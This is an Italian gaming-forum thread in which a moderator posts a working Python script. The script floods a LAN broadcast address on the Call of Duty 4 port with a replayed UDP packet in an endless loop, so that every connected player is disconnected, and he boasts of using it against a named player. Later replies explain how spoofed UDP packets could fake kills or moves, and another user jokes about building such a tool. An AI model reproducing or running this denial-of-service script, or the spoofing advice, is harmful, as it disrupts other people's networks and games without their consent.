KillerCD
Moderatore
Numero di messaggi : 380
Età : 38
Localizzazione : Proprio Cosenza Cosenza
Data d'iscrizione : 16.12.07
 | Titolo: COD4 Denial Of Service  Gio Giu 12, 2008 2:24 am | |
| ho notato che, a causa di un errore strutturale in Call Of Duty 4, è possibile bloccare i giocatori connessi alla lan. Il gioco letteralmente impazzisce.... ecco il prog in python per sfruttare questa vuln - Codice:
-
from socket import * #importo i socket e le funzioni di rete
data ="\x8d\xa2\x00\x00\xf5\x75\x30\xa8\x5d\x00\x00\xa9\x09\x00\x00\x69\xdf\x1e\x51\xf7\x66\x96\x33\x46\x0f\xa4\xf9\xf5\xae\x10\xb3\x89\x11\x14\x4e\xf1\x41\xa4\xff\x51\xaa\x30\x06\x21\xc4" #la stringa notifica lo spostamento di un giocatore o comunque qualche azione effettuata da esso
service = socket(AF_INET, SOCK_DGRAM) #inizializzo il "socket" UDP
while 1:
service.sendto(data,("169.254.255.255",28960)) #l'indirizzo ip si riferisce al broadcast, mentre la porta è quella usata da COD
tutti i players connessi alla lan riceveranno il pacchetto all'infinito e nessuno sarà più in grado di giocare. E' divertente usarlo quando gioca DarKane baciotti a tutti  | |
|
garulf
Primi Passi
Numero di messaggi : 59
Età : 36
Data d'iscrizione : 07.03.08
| | Titolo: Re: COD4 Denial Of Service Gio Giu 12, 2008 12:06 pm | |
| Bello!..funziona solo con l'azione associata a quella stringa o ne hai preso una a caso?
Sarebbe bello riuscire a far morire tutti..auhauhauahhua... | |
|
KillerCD
Moderatore
Numero di messaggi : 380
Età : 38
Localizzazione : Proprio Cosenza Cosenza
Data d'iscrizione : 16.12.07
| | Titolo: Re: COD4 Denial Of Service Gio Giu 12, 2008 12:57 pm | |
| - garulf ha scritto:
- Bello!..funziona solo con l'azione associata a quella stringa o ne hai preso una a caso?
Sarebbe bello riuscire a far morire tutti..auhauhauahhua... ho sniffato e ne ho presa una a caso, poi l'ho reinviata a tutti in un loop. E' tecnicamente possibile fare quello che dici tu perchè: il protocollo utilizzato è UDP, quindi forgiare un pacchetto spoofato è semplice. Teoricamente potrei segnalare uno spostamento oppure un uccisione da parte di DarKane a tutti. Nessuno sarebbe in grado di capire se l'azione è avvenuta davvero o la trasmissione è stata avvelenata | |
|
garulf
Primi Passi
Numero di messaggi : 59
Età : 36
Data d'iscrizione : 07.03.08
| | Titolo: Re: COD4 Denial Of Service Ven Giu 13, 2008 12:22 am | |
| - KillerCD ha scritto:
- garulf ha scritto:
- Bello!..funziona solo con l'azione associata a quella stringa o ne hai preso una a caso?
Sarebbe bello riuscire a far morire tutti..auhauhauahhua...
ho sniffato e ne ho presa una a caso, poi l'ho reinviata a tutti in un loop.
E' tecnicamente possibile fare quello che dici tu perchè: il protocollo utilizzato è UDP, quindi forgiare un pacchetto spoofato è semplice. Teoricamente potrei segnalare uno spostamento oppure un uccisione da parte di DarKane a tutti. Nessuno sarebbe in grado di capire se l'azione è avvenuta davvero o la trasmissione è stata avvelenata Si..valla a trovare però la stringa giusta però..con un paio di prove e un pò di fortuna si potrebbe creare un bellissimo tool "DarKane dice che è morto"..hhihi (mi scusi darKane che neanche conosco  ) | |
|
joe23
Nuovo Ingresso
Numero di messaggi : 29
Localizzazione : Palmi
Data d'iscrizione : 19.12.07
| | Titolo: Re: COD4 Denial Of Service Sab Giu 14, 2008 4:08 pm | |
| | |
|
Contenuto sponsorizzato
| | Titolo: Re: COD4 Denial Of Service | |
| |
|
